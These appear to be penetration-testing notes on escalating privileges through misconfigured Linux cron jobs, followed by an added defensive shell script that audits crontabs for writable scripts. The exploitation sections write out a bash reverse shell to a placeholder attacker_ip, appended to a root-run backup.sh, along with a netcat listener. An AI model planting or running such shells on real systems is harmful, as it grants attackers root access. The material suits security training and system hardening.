## General

A cron job vulnerability in Linux is a security weakness in the way cron jobs (scheduled tasks on a Linux system) are configured or used. It can allow an attacker to gain unauthorized access to a system, execute malicious code, or perform other malicious actions.

Some potential sources of cron job vulnerabilities include:

- Improperly configured cron job permissions: If a cron job (or the script it runs) has inadequate permissions, an attacker may be able to modify or delete it, or execute it with the privileges of the user or group that owns the cron job.
- Insecurely stored credentials: If a cron job requires access to sensitive data or resources, such as passwords or private keys, and these credentials are stored in an insecure manner (e.g., in a plaintext file), an attacker may be able to access them.
- Unvalidated input: If a cron job processes input from an untrusted source, such as data entered by a user or received over the network, and this input is not properly validated, an attacker may be able to inject malicious code or data that is executed when the cron job runs.

## Commands

### Manual Exploitation

1. Find writable files or directories (manual):

```
cat /etc/crontab ---> Check if there is a cron job
crontab -l       ---> Check the schedule for a cron job
```

- Check the permissions of the cron job scripts (e.g. writable and runs as root -> will give you root access)
- Check the schedule of the cron jobs
- Add a one-liner reverse shell to the writable file ---> [Link for one-liner reverse shell](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- Set a listener and wait for the cron job to be executed

### Automated Exploitation

Automated cron-job finding:

1. Run pspy to see running processes, commands, and cron jobs:

```
./pspy64 -pf -i 1000
```

---> GitHub link: https://github.com/DominicBreuker/pspy

![[Screenshot from 2022-11-28 20-46-56.png]]

2. (Example) From the above output, we can see that a cron job runs the backup.sh script located in the /dmz-backups directory and creates a tarball of the contents of the /var/www/html directory.

3. Examine the backup.sh script:

```
nano /dmz-backups/backup.sh ---> The vulnerable cron job (example)
```

4. Add a bash one-liner reverse shell to the end of the script:

```
#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
bash -i >& /dev/tcp/attacker_ip/443 0>&1
```

- Using port 443 (often allowed through firewalls) -- you are not obliged to use this port

5. Set up a netcat listener and become root!

```
nc -lnvp 443
```
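The permission check in the manual steps above ("writable and runs as root") is exactly what a system owner should be auditing for before an attacker does. The script below is an added defensive example, not part of the original notes or of pspy: it parses a file in /etc/crontab format (five time fields, a user field, then the command, or an @reboot-style line) and flags every job whose script is group- or world-writable, sits in a group- or world-writable directory, or is owned by neither root nor the job's user. The function names audit_crontab_file and count_weak_cron_entries are my own, the demo data (a temporary directory with a constructed world-writable backup.sh scheduled as root and a locked-down rotate.sh) is built inline, and the script assumes GNU stat.

```shell
#!/bin/sh
# Added example (not part of the original notes): audit a crontab in
# /etc/crontab format for jobs whose script can be tampered with.
# Assumes GNU stat (-c '%a' gives the octal mode, '%U' the owner name).

# Print "user script mode owner" for every job whose script is
# group/world-writable, lives in a group/world-writable directory
# (sticky bit not considered), or is owned by neither root nor the job's user.
audit_crontab_file() {
    crontab_file=$1
    while IFS= read -r line; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;   # blank line, comment, VAR=value
        esac
        # Split the line into fields without letting '*' expand as a glob.
        set -f
        set -- $line
        set +f
        case "$1" in
            @*) user=$2; cmd=$3 ;;             # @reboot root /path/script
            *)  user=$6; cmd=$7 ;;             # m h dom mon dow user command
        esac
        # Only plain file paths are checked; "cd /x && ..." style commands are skipped.
        [ -f "$cmd" ] || continue
        mode=$(stat -c '%a' "$cmd")
        owner=$(stat -c '%U' "$cmd")
        dir_mode=$(stat -c '%a' "$(dirname "$cmd")")
        weak=0
        # 022 masks the group-write and other-write permission bits.
        if [ $(( 0$mode & 022 )) -ne 0 ]; then weak=1; fi
        if [ $(( 0$dir_mode & 022 )) -ne 0 ]; then weak=1; fi
        if [ "$owner" != root ] && [ "$owner" != "$user" ]; then weak=1; fi
        if [ "$weak" -eq 1 ]; then
            printf '%s %s %s %s\n' "$user" "$cmd" "$mode" "$owner"
        fi
    done < "$crontab_file"
    return 0
}

# Number of weak entries, handy for scripting or alerting thresholds.
count_weak_cron_entries() {
    audit_crontab_file "$1" | wc -l | tr -d ' '
}

# Constructed demo data (not captured from a real system): a temp dir holding a
# world-writable backup.sh scheduled as root and a 700 rotate.sh scheduled as
# the current user. The directory is left in place so the output can be inspected.
DEMO_DIR=$(mktemp -d)
printf '#!/bin/bash\ntar -czf /tmp/www.tgz /var/www/html\n' > "$DEMO_DIR/backup.sh"
chmod 777 "$DEMO_DIR/backup.sh"
printf '#!/bin/bash\nlogrotate /etc/logrotate.conf\n' > "$DEMO_DIR/rotate.sh"
chmod 700 "$DEMO_DIR/rotate.sh"
DEMO_CRONTAB=$DEMO_DIR/crontab
cat > "$DEMO_CRONTAB" <<EOF
# constructed sample in /etc/crontab format
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/sbin:/sbin:/bin
*/5 * * * * root $DEMO_DIR/backup.sh
0 3 * * * $(id -un) $DEMO_DIR/rotate.sh
@reboot root $DEMO_DIR/missing.sh
EOF

# Expected: only the root job running the 777 backup.sh is reported.
audit_crontab_file "$DEMO_CRONTAB"
```

On a real host, run audit_crontab_file against /etc/crontab and every file in /etc/cron.d; anything it reports is a script an unprivileged user could edit and have cron run for them, which is the root-shell condition described in the notes. The test above only covers the system-crontab format; per-user crontabs (crontab -l) have no user field, so their fields would need to be shifted by one.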